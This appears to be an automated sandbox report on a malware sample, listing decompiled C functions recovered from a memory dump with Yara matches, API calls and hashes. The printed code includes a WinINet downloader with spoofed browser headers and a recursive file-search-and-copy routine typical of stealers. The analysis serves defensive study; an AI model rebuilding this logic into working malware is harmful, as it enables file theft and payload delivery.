                                                                                                                              • _fprintf.LIBCMT ref: 0041C57F
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0041C633
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$ByteCharMultiWide$FreeLibrary__ftbuf__lock_file__output_l__stbuf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2176516221-0
                                                                                                                              • Opcode ID: 8b9617d5ee5680184114d5a49bdd7cb62b92eda55f8ed9ff2480c090733e5350
                                                                                                                              • Instruction ID: 366089455bcf1858987bfbc5b8aa69005b404d304fa8a25bad335349cff2d88f
                                                                                                                              • Opcode Fuzzy Hash: 8b9617d5ee5680184114d5a49bdd7cb62b92eda55f8ed9ff2480c090733e5350
                                                                                                                              • Instruction Fuzzy Hash: 6651A3B1A42218ABEB64DB50DD81F9AB3B9EB58701F1041D9F70D672C0D674EE818F6C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00422200, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 180networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E00422200(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char _v56;
				char _v84;
				void* _v88;
				void _v92;
				void* _v96;
				void* _v100;
				int _v104;
				long _v108;
				char* _v112;
				intOrPtr _v116;
				signed int _t77;
				signed int _t78;
				long _t93;
				void* _t116;
				intOrPtr _t128;
				intOrPtr _t138;
				void* _t154;
				void* _t155;
				signed int _t156;
				void* _t160;

				_t155 = __esi;
				_t154 = __edi;
				_t116 = __ebx;
				_push(0xffffffff);
				_push(E00426667);
				_push( *[fs:0x0]);
				_t77 =  *0x4301f4; // 0xe687535
				_t78 = _t77 ^ _t156;
				_v28 = _t78;
				_push(_t78);
				 *[fs:0x0] =  &_v16;
				_v116 = __ecx;
				E004011C0( &_v56, _a4);
				_v8 = 0;
				_v20 = E00401EE0( &_v56, "http://", 0);
				_t160 = _v20 -  *0x42d8c4; // 0xffffffff
				if(_t160 != 0) {
					E00401B90( &_v56, _v20, 7);
				}
				_v20 = E00401370( &_v56, 0x2f, 0);
				E00401F30( &_v56,  &_v84, 0, _v20);
				_v8 = 1;
				E00401B90( &_v56, 0, _v20);
				_v20 = 0;
				E00401E10(_v116 + 0x44, 0x104, _a4, 0x103);
				_v24 = 0;
				if( *(_v116 + 0x38) != 0) {
					_v24 = _v24 | 0x00000003;
				}
				_t128 = _v116;
				_t150 =  *(_t128 + 0xc);
				_v88 = InternetOpenA( *(_t128 + 0xc), _v24,  *(_v116 + 0x38), 0, 0);
				if(_v88 != 0) {
					_v92 = 1;
					InternetSetOptionA(_v88, 0x41,  &_v92, 4);
					_t138 = _v116;
					_t150 =  *(_t138 + 0x3c);
					_v96 = InternetConnectA(_v88, E00401330( &_v84), 0x50,  *(_t138 + 0x3c),  *(_v116 + 0x40), 3, 0, 1);
					if(_v96 != 0) {
						_v100 = HttpOpenRequestA(_v96, "GET", E00401330( &_v56), 0, 0, 0, 0x400000, 1);
						if(_v100 != 0) {
							E004217A0(_t116, _v116, _t154, _t155, _v100);
							_v104 = HttpSendRequestA(_v100, 0, 0, 0, 0);
							if(_v104 != 0) {
								_v20 = E00421CF0(_t116, _v116, _t154, _t155, _v100);
							}
							_t150 = _v100;
							InternetCloseHandle(_v100);
						}
						InternetCloseHandle(_v96);
					}
					InternetCloseHandle(_v88);
				}
				if(_v20 <= 0) {
					_v112 = 0;
					_v8 = 0;
					E004012D0( &_v84);
					_v8 = 0xffffffff;
					E004012D0( &_v56);
					_t93 = _v112;
				} else {
					_v108 = 1;
					_v8 = 0;
					E004012D0( &_v84);
					_v8 = 0xffffffff;
					E004012D0( &_v56);
					_t93 = _v108;
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t93, _t116, _v28 ^ _t156, _t150, _t154, _t155);
			}




























                                                                                                                              0x00422200
                                                                                                                              0x00422200
                                                                                                                              0x00422200
                                                                                                                              0x00422203
                                                                                                                              0x00422205
                                                                                                                              0x00422210
                                                                                                                              0x00422214
                                                                                                                              0x00422219
                                                                                                                              0x0042221b
                                                                                                                              0x0042221e
                                                                                                                              0x00422222
                                                                                                                              0x00422228
                                                                                                                              0x00422232
                                                                                                                              0x00422237
                                                                                                                              0x0042224d
                                                                                                                              0x00422253
                                                                                                                              0x00422259
                                                                                                                              0x00422264
                                                                                                                              0x00422264
                                                                                                                              0x00422275
                                                                                                                              0x00422285
                                                                                                                              0x0042228a
                                                                                                                              0x00422297
                                                                                                                              0x0042229c
                                                                                                                              0x004222b8
                                                                                                                              0x004222c0
                                                                                                                              0x004222ce
                                                                                                                              0x004222d6
                                                                                                                              0x004222d6
                                                                                                                              0x004222e8
                                                                                                                              0x004222eb
                                                                                                                              0x004222f5
                                                                                                                              0x004222fc
                                                                                                                              0x00422302
                                                                                                                              0x00422315
                                                                                                                              0x00422328
                                                                                                                              0x0042232b
                                                                                                                              0x00422344
                                                                                                                              0x0042234b
                                                                                                                              0x00422372
                                                                                                                              0x00422379
                                                                                                                              0x00422382
                                                                                                                              0x00422399
                                                                                                                              0x004223a0
                                                                                                                              0x004223ae
                                                                                                                              0x004223ae
                                                                                                                              0x004223b1
                                                                                                                              0x004223b5
                                                                                                                              0x004223b5
                                                                                                                              0x004223bf
                                                                                                                              0x004223bf
                                                                                                                              0x004223c9
                                                                                                                              0x004223c9
                                                                                                                              0x004223d3
                                                                                                                              0x004223fe
                                                                                                                              0x00422405
                                                                                                                              0x0042240c
                                                                                                                              0x00422411
                                                                                                                              0x0042241b
                                                                                                                              0x00422420
                                                                                                                              0x004223d5
                                                                                                                              0x004223d5
                                                                                                                              0x004223dc
                                                                                                                              0x004223e3
                                                                                                                              0x004223e8
                                                                                                                              0x004223f2
                                                                                                                              0x004223f7
                                                                                                                              0x004223f7
                                                                                                                              0x00422443
                                                                                                                              0x00422458

                                                                                                                              APIs
                                                                                                                              • __mbstowcs_l.LIBCMTD ref: 004222B8
                                                                                                                              • InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 004222EF
                                                                                                                              • InternetSetOptionA.WININET(00000000,00000041,00000001,00000004), ref: 00422315
                                                                                                                              • InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0042233E
                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,00400000,00000001), ref: 0042236C
                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00422393
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004223B5
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004223BF
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004223C9
                                                                                                                                • Part of subcall function 00421CF0: InternetSetFilePointer.WININET(0042280B,00000000,00000000,00000000,00000000), ref: 00421D94
                                                                                                                                • Part of subcall function 00421CF0: InternetReadFile.WININET(0042280B,?,000003E8,00000000), ref: 00421DBA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$CloseHandle$FileHttpOpenRequest$ConnectOptionPointerReadSend__mbstowcs_l
                                                                                                                              • String ID: GET$http://
                                                                                                                              • API String ID: 3227830049-1632879366
                                                                                                                              • Opcode ID: 3594bfadbcd0b2e168513e83fb03b8f3dc0df1efc696576d5205c50443355d01
                                                                                                                              • Instruction ID: 610c6cca322e3e47b99bbd2dde3902dd4f332298f4cea05fed20cb52f9e14152
                                                                                                                              • Opcode Fuzzy Hash: 3594bfadbcd0b2e168513e83fb03b8f3dc0df1efc696576d5205c50443355d01
                                                                                                                              • Instruction Fuzzy Hash: 0A711670A00218ABDB14EBE4DD95BEEB7B5BF04704F60412DF502BB2D1DBB86945CB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041BB00, Relevance: 18.3, APIs: 12, Instructions: 257stringfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041BB1F
                                                                                                                              • lstrcat.KERNEL32(?,02336800), ref: 0041BB33
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041BB46
                                                                                                                              • _memset.LIBCMT ref: 0041BB5A
                                                                                                                              • wsprintfA.USER32 ref: 0041BB78
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041BECC
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • lstrcat.KERNEL32(?,02336750), ref: 0041BD45
                                                                                                                              • lstrcat.KERNEL32(?,02336820), ref: 0041BD65
                                                                                                                              • lstrcat.KERNEL32(?,02336750), ref: 0041BE16
                                                                                                                              • lstrcat.KERNEL32(?,02336820), ref: 0041BE36
                                                                                                                              • _fprintf.LIBCMT ref: 0041BE7B
                                                                                                                              • _fprintf.LIBCMT ref: 0041BE8F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3836584492-0
                                                                                                                              • Opcode ID: 04b5c87693709f99ce2bd01f3d8e9ad4fe9a8a8fd04c4f6e169bdc3827cc32a1
                                                                                                                              • Instruction ID: 98873328e225f771882efd5b2253d5c8ca372c8d610c10d87794e9511f24b4a7
                                                                                                                              • Opcode Fuzzy Hash: 04b5c87693709f99ce2bd01f3d8e9ad4fe9a8a8fd04c4f6e169bdc3827cc32a1
                                                                                                                              • Instruction Fuzzy Hash: D7B13EB1E00258AFCB24DF64ED88BDAB7B5EB48301F1482E9E509A7250D7759EC4CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420A30, Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 97%
                                                                                                                              			E00420A30(void* __ebx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v20276;
				char _v20540;
				CHAR* _v20544;
				char _v20548;
				intOrPtr _v20552;
				signed int _t36;
				CHAR* _t45;
				CHAR* _t52;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t82;

				_t75 = __esi;
				_t74 = __edi;
				_t60 = __ebx;
				E00412A40(0x5044);
				_t36 =  *0x4301f4; // 0xe687535
				_v12 = _t36 ^ _t76;
				E004091C0( &_v20276, 0, 0x4e20);
				E004091C0( &_v276, 0, 0x104);
				E004091C0( &_v20540, 0, 0x104);
				wsprintfA( &_v20276, _a4);
				_t71 =  &_v20548;
				_t45 = E0040540F(__ebx,  &_v20548, __edi,  &_v20276, ";",  &_v20548);
				_t82 = _t77 + 0x38;
				_v20544 = _t45;
				_v8 = 1;
				while(_v20544 != 0) {
					_v20552 = _v8;
					if(_v20552 == 1) {
						_t71 = _v20544;
						wsprintfA( &_v276, _v20544);
						_t82 = _t82 + 8;
					} else {
						if(_v20552 == 2) {
							_t71 =  &_v20540;
							wsprintfA( &_v20540, _v20544);
							_t82 = _t82 + 8;
						} else {
							if(_v20552 == 3) {
								E004207B0(_t60, _t74, _t75,  &_v276,  &_v20540, _v20544);
								E004091C0( &_v276, 0, 0x104);
								E004091C0( &_v20540, 0, 0x104);
								_t82 = _t82 + 0x24;
								_t71 = _a8;
								SetCurrentDirectoryA(_a8);
								_v8 = 0;
							}
						}
					}
					_v8 = _v8 + 1;
					_t52 = E0040540F(_t60, _t71, _t74, 0, ";",  &_v20548);
					_t82 = _t82 + 0xc;
					_v20544 = _t52;
				}
				return E00404354(E004091C0( &_v20276, 0, 0x4e20), _t60, _v12 ^ _t76,  &_v20276, _t74, _t75);
			}


















                                                                                                                              0x00420a30
                                                                                                                              0x00420a30
                                                                                                                              0x00420a30
                                                                                                                              0x00420a38
                                                                                                                              0x00420a3d
                                                                                                                              0x00420a44
                                                                                                                              0x00420a55
                                                                                                                              0x00420a6b
                                                                                                                              0x00420a81
                                                                                                                              0x00420a94
                                                                                                                              0x00420a9d
                                                                                                                              0x00420ab0
                                                                                                                              0x00420ab5
                                                                                                                              0x00420ab8
                                                                                                                              0x00420abe
                                                                                                                              0x00420ac5
                                                                                                                              0x00420ad5
                                                                                                                              0x00420ae2
                                                                                                                              0x00420afb
                                                                                                                              0x00420b09
                                                                                                                              0x00420b0f
                                                                                                                              0x00420ae4
                                                                                                                              0x00420aeb
                                                                                                                              0x00420b1b
                                                                                                                              0x00420b22
                                                                                                                              0x00420b28
                                                                                                                              0x00420aed
                                                                                                                              0x00420af4
                                                                                                                              0x00420b42
                                                                                                                              0x00420b58
                                                                                                                              0x00420b6e
                                                                                                                              0x00420b73
                                                                                                                              0x00420b76
                                                                                                                              0x00420b7a
                                                                                                                              0x00420b80
                                                                                                                              0x00420b80
                                                                                                                              0x00420af4
                                                                                                                              0x00420aeb
                                                                                                                              0x00420b8d
                                                                                                                              0x00420b9e
                                                                                                                              0x00420ba3
                                                                                                                              0x00420ba6
                                                                                                                              0x00420ba6
                                                                                                                              0x00420bd4

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$wsprintf$_strtok_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2217037046-0
                                                                                                                              • Opcode ID: 5b73ba11990efded92794ba239d3f653404a1504c2da1255940934dc07b24593
                                                                                                                              • Instruction ID: 0af7a6de36b6c7e90aa8e6a8f51bfe9d77b64d07dc96b163082216e34aae25e5
                                                                                                                              • Opcode Fuzzy Hash: 5b73ba11990efded92794ba239d3f653404a1504c2da1255940934dc07b24593
                                                                                                                              • Instruction Fuzzy Hash: E64188F1E10218EBDB24EB50EC46BDE7378AF44709F4440EAE7096A182D6745F88CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C0CA, Relevance: 15.1, APIs: 10, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$FreeLibrary__ftbuf__lock_file__output_l__stbuf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1611942462-0
                                                                                                                              • Opcode ID: 8b9617d5ee5680184114d5a49bdd7cb62b92eda55f8ed9ff2480c090733e5350
                                                                                                                              • Instruction ID: 366089455bcf1858987bfbc5b8aa69005b404d304fa8a25bad335349cff2d88f
                                                                                                                              • Opcode Fuzzy Hash: 8b9617d5ee5680184114d5a49bdd7cb62b92eda55f8ed9ff2480c090733e5350
                                                                                                                              • Instruction Fuzzy Hash: 6651A3B1A42218ABEB64DB50DD81F9AB3B9EB58701F1041D9F70D672C0D674EE818F6C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004202A0, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 169COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E004202A0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, char* _a4, intOrPtr _a8, CHAR* _a12, char* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				intOrPtr _v284;
				char _v844;
				char* _v848;
				char* _v852;
				char _v853;
				char _v854;
				char* _v860;
				char* _v864;
				intOrPtr* _v868;
				char* _v872;
				char _v873;
				char _v874;
				char* _v880;
				char* _v884;
				signed int _t76;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t87;
				int _t91;
				char* _t94;
				char* _t95;
				signed int _t108;
				char _t111;
				char _t112;
				char _t113;
				char _t114;
				signed int _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t141;

				_t133 = __esi;
				_t132 = __edi;
				_t115 = __edx;
				_t100 = __ebx;
				_t76 =  *0x4301f4; // 0xe687535
				_v12 = _t76 ^ _t134;
				SetCurrentDirectoryA(_a12);
				_t101 = _a12;
				_t80 = E0041FB40(__ebx, _t115, __edi, __esi, _a12);
				_t136 = _t135 + 4;
				_v284 = _t80;
				if(_v284 == 0) {
					L28:
					__eflags = _v12 ^ _t134;
					return E00404354(_t80, _t100, _v12 ^ _t134, _t115, _t132, _t133);
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t82 = E0041FB20(_t101, _v284);
					_t137 = _t136 + 4;
					_v8 = _t82;
					if(_v8 == 0) {
						break;
					}
					E004091C0( &_v844, 0, 0x104);
					wsprintfA( &_v844, "%s\\%s", _a12, _v8 + 0x14);
					_t87 = E004052FA(_t133, _a8, 0x4294cd);
					_t141 = _t137 + 0x24;
					if(_t87 != 0) {
						_t108 = _v8 + 0x14;
						__eflags = _t108;
						wsprintfA( &_v276, "%s\\%s", _a8, _t108);
						_t136 = _t141 + 0x10;
					} else {
						wsprintfA( &_v276, "%s", _v8 + 0x14);
						_t136 = _t141 + 0xc;
					}
					if( *((intOrPtr*)(_v8 + 0x10)) != 0x4000) {
						_t101 = _v8 + 0x14;
						_t91 = PathMatchSpecA(_v8 + 0x14, _a16);
						__eflags = _t91;
						if(_t91 != 0) {
							_t101 = _a4;
							E00419580(_a4,  &_v276,  &_v844);
							_t136 = _t136 + 0xc;
						}
						goto L26;
					} else {
						_v848 = ".";
						_v852 = _v8 + 0x14;
						while(1) {
							_t94 = _v852;
							_t111 =  *_t94;
							_v853 = _t111;
							if(_t111 !=  *_v848) {
								break;
							}
							if(_v853 == 0) {
								L11:
								_v860 = 0;
								L13:
								_t101 = _v860;
								_v864 = _v860;
								if(_v864 == 0) {
									L22:
									goto L1;
								}
								_v868 = "..";
								_v872 = _v8 + 0x14;
								while(1) {
									_t95 = _v872;
									_t112 =  *_t95;
									_v873 = _t112;
									if(_t112 !=  *_v868) {
										break;
									}
									if(_v873 == 0) {
										L19:
										_v880 = 0;
										L21:
										_t101 = _v880;
										_v884 = _v880;
										if(_v884 != 0) {
											_t101 =  &_v276;
											E004202A0(_t100, _a4, _t132, _t133, __eflags, _a4,  &_v276,  &_v844, _a16);
											_t136 = _t136 + 0x10;
											L26:
											goto L1;
										}
										goto L22;
									}
									_t95 = _v872;
									_t113 = _t95[1];
									_v874 = _t113;
									_t54 = _v868 + 1; // 0x2c00002e
									if(_t113 !=  *_t54) {
										break;
									}
									_v872 =  &(_v872[2]);
									_v868 = _v868 + 2;
									if(_v874 != 0) {
										continue;
									}
									goto L19;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v880 = _t95;
								goto L21;
							}
							_t94 = _v852;
							_t114 = _t94[1];
							_v854 = _t114;
							_t32 =  &(_v848[1]); // 0x2e000000
							if(_t114 !=  *_t32) {
								break;
							}
							_v852 =  &(_v852[2]);
							_v848 =  &(_v848[2]);
							if(_v854 != 0) {
								continue;
							}
							goto L11;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v860 = _t94;
						goto L13;
					}
				}
				_t115 = _v284;
				_t80 = E0041F970(_t101, _v284);
				goto L28;
			}





































                                                                                                                              0x004202a0
                                                                                                                              0x004202a0
                                                                                                                              0x004202a0
                                                                                                                              0x004202a0
                                                                                                                              0x004202a9
                                                                                                                              0x004202b0
                                                                                                                              0x004202b7
                                                                                                                              0x004202bd
                                                                                                                              0x004202c1
                                                                                                                              0x004202c6
                                                                                                                              0x004202c9
                                                                                                                              0x004202d6
                                                                                                                              0x00420525
                                                                                                                              0x00420528
                                                                                                                              0x00420532
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004202dc
                                                                                                                              0x004202dc
                                                                                                                              0x004202e3
                                                                                                                              0x004202e8
                                                                                                                              0x004202eb
                                                                                                                              0x004202f2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420306
                                                                                                                              0x00420325
                                                                                                                              0x00420337
                                                                                                                              0x0042033c
                                                                                                                              0x00420341
                                                                                                                              0x00420364
                                                                                                                              0x00420364
                                                                                                                              0x00420378
                                                                                                                              0x0042037e
                                                                                                                              0x00420343
                                                                                                                              0x00420356
                                                                                                                              0x0042035c
                                                                                                                              0x0042035c
                                                                                                                              0x0042038b
                                                                                                                              0x004204e9
                                                                                                                              0x004204ed
                                                                                                                              0x004204f3
                                                                                                                              0x004204f5
                                                                                                                              0x00420505
                                                                                                                              0x00420509
                                                                                                                              0x0042050e
                                                                                                                              0x0042050e
                                                                                                                              0x00000000
                                                                                                                              0x00420391
                                                                                                                              0x00420391
                                                                                                                              0x004203a1
                                                                                                                              0x004203a7
                                                                                                                              0x004203a7
                                                                                                                              0x004203ad
                                                                                                                              0x004203af
                                                                                                                              0x004203bd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203c6
                                                                                                                              0x004203f9
                                                                                                                              0x004203f9
                                                                                                                              0x00420410
                                                                                                                              0x00420410
                                                                                                                              0x00420416
                                                                                                                              0x00420423
                                                                                                                              0x004204bd
                                                                                                                              0x00000000
                                                                                                                              0x004204bd
                                                                                                                              0x00420429
                                                                                                                              0x00420439
                                                                                                                              0x0042043f
                                                                                                                              0x0042043f
                                                                                                                              0x00420445
                                                                                                                              0x00420447
                                                                                                                              0x00420455
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042045e
                                                                                                                              0x00420491
                                                                                                                              0x00420491
                                                                                                                              0x004204a8
                                                                                                                              0x004204a8
                                                                                                                              0x004204ae
                                                                                                                              0x004204bb
                                                                                                                              0x004204cd
                                                                                                                              0x004204d8
                                                                                                                              0x004204dd
                                                                                                                              0x00420511
                                                                                                                              0x00000000
                                                                                                                              0x00420511
                                                                                                                              0x00000000
                                                                                                                              0x004204bb
                                                                                                                              0x00420460
                                                                                                                              0x00420466
                                                                                                                              0x00420469
                                                                                                                              0x00420475
                                                                                                                              0x00420478
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042047a
                                                                                                                              0x00420481
                                                                                                                              0x0042048f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042048f
                                                                                                                              0x0042049d
                                                                                                                              0x0042049f
                                                                                                                              0x004204a2
                                                                                                                              0x00000000
                                                                                                                              0x004204a2
                                                                                                                              0x004203c8
                                                                                                                              0x004203ce
                                                                                                                              0x004203d1
                                                                                                                              0x004203dd
                                                                                                                              0x004203e0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203e2
                                                                                                                              0x004203e9
                                                                                                                              0x004203f7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203f7
                                                                                                                              0x00420405
                                                                                                                              0x00420407
                                                                                                                              0x0042040a
                                                                                                                              0x00000000
                                                                                                                              0x0042040a
                                                                                                                              0x0042038b
                                                                                                                              0x00420516
                                                                                                                              0x0042051d
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$CurrentDirectoryMatchPathSpec_memset
                                                                                                                              • String ID: %s\%s$%s\%s
                                                                                                                              • API String ID: 512208171-3515709335
                                                                                                                              • Opcode ID: 141f0e15cebe44d10cad8ad4f2c8c8da476f08cf655785c2c70918d9b4770972
                                                                                                                              • Instruction ID: ae06e90ec2fe91b52258a92f08eb3126106a9cd97fdc9158904f1280b265a2f4
                                                                                                                              • Opcode Fuzzy Hash: 141f0e15cebe44d10cad8ad4f2c8c8da476f08cf655785c2c70918d9b4770972
                                                                                                                              • Instruction Fuzzy Hash: F1718DB0E00268ABCB26DF24EC45BEEB7B9AF44304F5481DAE51967282D7349F84CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004217A0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E004217A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				intOrPtr _v52;
				signed int _t26;
				long _t30;
				long _t35;
				long _t39;
				long _t43;
				void* _t47;
				signed int _t72;

				_push(0xffffffff);
				_push(E004264E5);
				_push( *[fs:0x0]);
				_t26 =  *0x4301f4; // 0xe687535
				_t27 = _t26 ^ _t72;
				_v20 = _t26 ^ _t72;
				 *[fs:0x0] =  &_v16;
				_v52 = __ecx;
				E004011C0( &_v48, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1");
				_v8 = 0;
				_t30 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t30, 0x20000000);
				E00401EA0( &_v48, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8");
				_t35 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t35, 0x20000000);
				E00401EA0( &_v48, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1");
				_t39 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t39, 0x20000000);
				E00401EA0( &_v48, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0");
				_t43 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t43, 0x20000000);
				_v8 = 0xffffffff;
				_t47 = E004012D0( &_v48);
				 *[fs:0x0] = _v16;
				return E00404354(_t47, __ebx, _v20 ^ _t72, _a4, __edi, __esi, _t27);
			}















                                                                                                                              0x004217a3
                                                                                                                              0x004217a5
                                                                                                                              0x004217b0
                                                                                                                              0x004217b4
                                                                                                                              0x004217b9
                                                                                                                              0x004217bb
                                                                                                                              0x004217c2
                                                                                                                              0x004217c8
                                                                                                                              0x004217d3
                                                                                                                              0x004217d8
                                                                                                                              0x004217e7
                                                                                                                              0x004217fa
                                                                                                                              0x00421808
                                                                                                                              0x00421815
                                                                                                                              0x00421828
                                                                                                                              0x00421836
                                                                                                                              0x00421843
                                                                                                                              0x00421856
                                                                                                                              0x00421864
                                                                                                                              0x00421871
                                                                                                                              0x00421884
                                                                                                                              0x0042188a
                                                                                                                              0x00421894
                                                                                                                              0x0042189c
                                                                                                                              0x004218b1

                                                                                                                              APIs
                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 004217FA
                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421828
                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421856
                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421884
                                                                                                                              Strings
                                                                                                                              • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 0042185C
                                                                                                                              • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00421800
                                                                                                                              • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 004217CB
                                                                                                                              • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0042182E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: HeadersHttpRequest
                                                                                                                              • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
